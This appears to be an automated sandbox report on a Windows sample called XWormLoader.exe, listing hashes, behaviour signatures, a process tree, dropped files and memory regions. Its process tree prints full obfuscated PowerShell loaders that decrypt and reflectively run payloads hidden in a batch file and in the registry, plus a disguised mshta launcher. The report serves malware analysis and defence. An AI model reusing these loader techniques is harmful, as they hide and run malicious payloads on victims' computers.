Analysis

  • max time kernel
    30s
  • max time network
    32s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-03-2024 22:16

General

  • Target

    X-Worm-V5-main/XWorm V5.0/XWormLoader.exe

  • Size

    8.6MB

  • MD5

    2aff4d1edefd1017408f77bbf15ef6c2

  • SHA1

    cfc1827c2e45802cbfe931ab66dea427c512a6ab

  • SHA256

    7de8a4b7288fe71fdb8fa2eb453059937ce5ff998e117dc79c8d68de7e0f9315

  • SHA512

    a456dba519592187461596f0ceb1e008e0a9a974a79698acda5bb1cfe000b99fd1bcafe140a022a40db6b447cb70e335dba137500a4f05e68299a3da758f9756

  • SSDEEP

    196608:6HwveWmitDQXAWhg8tlFPreKofxWJHVP3u8CkXt0rQMJB4Eo:IkmitD85hgAtop81Hh0sUBk

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\X-Worm-V5-main\XWorm V5.0\XWormLoader.exe
    "C:\Users\Admin\AppData\Local\Temp\X-Worm-V5-main\XWorm V5.0\XWormLoader.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3316
    • C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe
      "C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe"
      2⤵
      • Executes dropped EXE
      PID:1356
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 1356 -s 884
        3⤵
        • Program crash
        PID:1416
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\svchost.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1064
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo function ZSHdk($KarSC){ $ZfCFn=[System.Security.Cryptography.Aes]::Create(); $ZfCFn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $ZfCFn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $ZfCFn.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('KtZKjEms98+Uz3JdAwXifcpceQe4mGFCZZetPfWLjV8='); $ZfCFn.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('XxhTpYt8KLdLDSpO7hDOxw=='); $tlguC=$ZfCFn.CreateDecryptor(); $return_var=$tlguC.TransformFinalBlock($KarSC, 0, $KarSC.Length); $tlguC.Dispose(); $ZfCFn.Dispose(); $return_var;}function CaoMW($KarSC){ $tLaFs=New-Object System.IO.MemoryStream(,$KarSC); $lDGtw=New-Object System.IO.MemoryStream; Invoke-Expression '$ixeoS #=# #N#e#w#-#O#b#j#e#c#t# #S#y#s#t#e#m#.#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#G#Z#i#p#S#t#r#e#a#m#(#$tLaFs,# #[#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#C#o#m#p#r#e#s#s#i#o#n#M#o#d#e#]#:#:#D#e#c#o#m#p#r#e#s#s#)#;#'.Replace('#', ''); $ixeoS.CopyTo($lDGtw); $ixeoS.Dispose(); $tLaFs.Dispose(); $lDGtw.Dispose(); $lDGtw.ToArray();}function akbWW($KarSC,$vyQOD){ $xXjIa = @( '$qtafy = [System.Reflection.Assembly]::("@L@o@a@d@".Replace("@", ""))([byte[]]$KarSC);', '$FBuAc = $qtafy.EntryPoint;', '$FBuAc.Invoke($null, $vyQOD);' ); foreach ($eBUTc in $xXjIa) { Invoke-Expression $eBUTc };}$QCWfW=[System.IO.File]::("@R@e@a@d@A@l@l@T@e@x@t@".Replace("@", ""))('C:\Users\Admin\AppData\Local\Temp\svchost.bat').Split([Environment]::NewLine);foreach ($hgEiC in $QCWfW) { if ($hgEiC.StartsWith('SEROXEN')) { $GFlqW=$hgEiC.Substring(7); break; }}$llOQb=CaoMW (ZSHdk ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($GFlqW)));akbWW $llOQb (,[string[]] ('C:\Users\Admin\AppData\Local\Temp\svchost.bat')); "
        3⤵
          PID:2336
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
          3⤵
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2096
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1356 -ip 1356
      1⤵
        PID:1468
      • C:\Windows\$sxr-mshta.exe
        C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-TwfkFnoyLGWlxhzmArsw4312:SwveldPS=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
        1⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:1764
        • C:\Windows\$sxr-cmd.exe
          "C:\Windows\$sxr-cmd.exe" /c %$sxr-TwfkFnoyLGWlxhzmArsw4312:SwveldPS=%
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2800
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo function ASDgm($hbtlH){ $jvCLB=[System.Security.Cryptography.Aes]::Create(); $jvCLB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $jvCLB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $jvCLB.Key=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('blz4wP7NQ0z9G5HU5qt1rBXWDUDwhPjk4R14Im6s+lY='); $jvCLB.IV=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('tyHaD0iUmC1atKVX/rbjZw=='); $bkHaC=$jvCLB.('@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@'.Replace('@', ''))(); $KdWyo=$bkHaC.('@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@'.Replace('@', ''))($hbtlH, 0, $hbtlH.Length); $bkHaC.Dispose(); $jvCLB.Dispose(); $KdWyo;}function cHftl($hbtlH){ $ZLGfO=New-Object System.IO.MemoryStream(,$hbtlH); $pEGfA=New-Object System.IO.MemoryStream; Invoke-Expression '$YNTor @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$ZLGfO,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $YNTor.CopyTo($pEGfA); $YNTor.Dispose(); $ZLGfO.Dispose(); $pEGfA.Dispose(); $pEGfA.ToArray();}function cDPce($hbtlH){ $KdWyo = [System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($hbtlH); $KdWyo = ASDgm($KdWyo); $KdWyo = [System.Text.Encoding]::('@U@T@F@8@'.Replace('@', '')).('@G@e@t@S@t@r@i@n@g@'.Replace('@', ''))($KdWyo); return $KdWyo;}function execute_function($hbtlH,$HyIWf){ $wMvLZ = @( '$gbejj = [System.Reflection.Assembly]::Load([byte[]]$hbtlH);', '$nYAXe = $gbejj.EntryPoint;', '$nYAXe.Invoke($null, $HyIWf);' ); foreach ($XGPPP in $wMvLZ) { Invoke-Expression $XGPPP };}$WwewB = cDPce('6jh9/JwNM6P3zg5yY8XZBg==');$pAwEN = cDPce('ZViCuth6vUsFE5+msWnrZo/mOl8APvimIOP0OBotRXY=');$EiozW = cDPce('e/do7iEa4WyK+N/slo150A==');$xMYjW = cDPce('0AZpRDqOSBwoRnb0ckOSHA==');if (@(get-process -ea silentlycontinue $xMYjW).count -gt 1) {exit};$AmhAI = [Microsoft.Win32.Registry]::('@L@o@c@a@l@M@a@c@h@i@n@e@'.Replace('@', '')).('@O@p@e@n@S@u@b@k@e@y@'.Replace('@', ''))($WwewB).('@G@e@t@V@a@l@u@e@'.Replace('@', ''))($pAwEN);$lPNsi=cHftl (ASDgm ([Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($AmhAI)));execute_function $lPNsi (,[string[]] ($EiozW)); "
            3⤵
              PID:2340
            • C:\Windows\$sxr-powershell.exe
              C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass
              3⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3940

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Discovery

        Query Registry

        2
        T1012

        System Information Discovery

        2
        T1082

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
          Filesize

          53KB

          MD5

          a26df49623eff12a70a93f649776dab7

          SHA1

          efb53bd0df3ac34bd119adf8788127ad57e53803

          SHA256

          4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

          SHA512

          e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

        • C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe
          Filesize

          101KB

          MD5

          39d81ca537ceb52632fbb2e975c3ee2f

          SHA1

          0a3814bd3ccea28b144983daab277d72313524e4

          SHA256

          76c4d61afdebf279316b40e1ca3c56996b16d760aa080d3121d6982f0e61d8e7

          SHA512

          18f7acf9e7b992e95f06ab1c96f017a6e7acde36c1e7c1ff254853a1bfcde65abcdaa797b36071b9349e83aa2c0a45c6dfb2d637c153b53c66fc92066f6d4f9a

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pz3lsmke.xbe.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\svchost.bat
          Filesize

          11.9MB

          MD5

          2892f2caa15e37c12faea09c6bb5a44a

          SHA1

          8f401732b8a3a8b1022ef52836a4e7eac604146a

          SHA256

          c5ece24bcd43419cf718605925b565c17bc668ab7d3801a1d923465b15bd9f1f

          SHA512

          35abceb95d61ba4bfb6facc9559fe4d2db3eec9810bff4230c697864e0bd37e58ec1c1d817a766cfc07b12bed0dfedecfab01179f7295d1118347ba432ee996d

        • C:\Windows\$sxr-cmd.exe
          Filesize

          283KB

          MD5

          8a2122e8162dbef04694b9c3e0b6cdee

          SHA1

          f1efb0fddc156e4c61c5f78a54700e4e7984d55d

          SHA256

          b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

          SHA512

          99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

        • C:\Windows\$sxr-mshta.exe
          Filesize

          14KB

          MD5

          0b4340ed812dc82ce636c00fa5c9bef2

          SHA1

          51c97ebe601ef079b16bcd87af827b0be5283d96

          SHA256

          dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

          SHA512

          d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

        • C:\Windows\$sxr-powershell.exe
          Filesize

          442KB

          MD5

          04029e121a0cfa5991749937dd22a1d9

          SHA1

          f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

          SHA256

          9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

          SHA512

          6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

        • memory/1356-19-0x00000000750F0000-0x00000000758A0000-memory.dmp
          Filesize

          7.7MB

        • memory/1356-20-0x0000000000C00000-0x0000000000C1E000-memory.dmp
          Filesize

          120KB

        • memory/1356-22-0x00000000750F0000-0x00000000758A0000-memory.dmp
          Filesize

          7.7MB

        • memory/2096-33-0x00007FFE77B80000-0x00007FFE78641000-memory.dmp
          Filesize

          10.8MB

        • memory/2096-47-0x0000025D6FA40000-0x0000025D6FA6E000-memory.dmp
          Filesize

          184KB

        • memory/2096-34-0x0000025D6EB70000-0x0000025D6EB80000-memory.dmp
          Filesize

          64KB

        • memory/2096-35-0x0000025D6EB70000-0x0000025D6EB80000-memory.dmp
          Filesize

          64KB

        • memory/2096-36-0x0000025D6F630000-0x0000025D6F674000-memory.dmp
          Filesize

          272KB

        • memory/2096-37-0x0000025D6FAC0000-0x0000025D6FB36000-memory.dmp
          Filesize

          472KB

        • memory/2096-38-0x0000025D77E60000-0x0000025D786F8000-memory.dmp
          Filesize

          8.6MB

        • memory/2096-39-0x00007FFE94EF0000-0x00007FFE94FAE000-memory.dmp
          Filesize

          760KB

        • memory/2096-40-0x00007FFE96390000-0x00007FFE96585000-memory.dmp
          Filesize

          2.0MB

        • memory/2096-41-0x00007FFE96390000-0x00007FFE96585000-memory.dmp
          Filesize

          2.0MB

        • memory/2096-42-0x00007FFE96390000-0x00007FFE96585000-memory.dmp
          Filesize

          2.0MB

        • memory/2096-43-0x0000025D6FB40000-0x0000025D7060A000-memory.dmp
          Filesize

          10.8MB

        • memory/2096-44-0x0000025D70610000-0x0000025D706AA000-memory.dmp
          Filesize

          616KB

        • memory/2096-45-0x0000025D6F5E0000-0x0000025D6F632000-memory.dmp
          Filesize

          328KB

        • memory/2096-46-0x0000025D6F680000-0x0000025D6F6D8000-memory.dmp
          Filesize

          352KB

        • memory/2096-32-0x0000025D6EC20000-0x0000025D6EC42000-memory.dmp
          Filesize

          136KB

        • memory/2096-55-0x0000025D56860000-0x0000025D56868000-memory.dmp
          Filesize

          32KB

        • memory/2096-56-0x0000000180000000-0x0000000180009000-memory.dmp
          Filesize

          36KB

        • memory/2096-57-0x00007FFE77B80000-0x00007FFE78641000-memory.dmp
          Filesize

          10.8MB

        • memory/2096-82-0x0000025D6EB70000-0x0000025D6EB80000-memory.dmp
          Filesize

          64KB

        • memory/2096-68-0x0000025D6EB70000-0x0000025D6EB80000-memory.dmp
          Filesize

          64KB

        • memory/3316-3-0x000000001C800000-0x000000001C810000-memory.dmp
          Filesize

          64KB

        • memory/3316-18-0x00007FFE780D0000-0x00007FFE78B91000-memory.dmp
          Filesize

          10.8MB

        • memory/3316-1-0x00007FFE780D0000-0x00007FFE78B91000-memory.dmp
          Filesize

          10.8MB

        • memory/3316-0-0x0000000000480000-0x0000000000D16000-memory.dmp
          Filesize

          8.6MB

        • memory/3940-69-0x00007FFE77B80000-0x00007FFE78641000-memory.dmp
          Filesize

          10.8MB

        • memory/3940-70-0x000001EBCB510000-0x000001EBCB520000-memory.dmp
          Filesize

          64KB

        • memory/3940-71-0x000001EBCB510000-0x000001EBCB520000-memory.dmp
          Filesize

          64KB

        • memory/3940-83-0x000001EBF45E0000-0x000001EBF4BF0000-memory.dmp
          Filesize

          6.1MB

        • memory/3940-84-0x00007FFE94EF0000-0x00007FFE94FAE000-memory.dmp
          Filesize

          760KB

        • memory/3940-85-0x00007FFE96390000-0x00007FFE96585000-memory.dmp
          Filesize

          2.0MB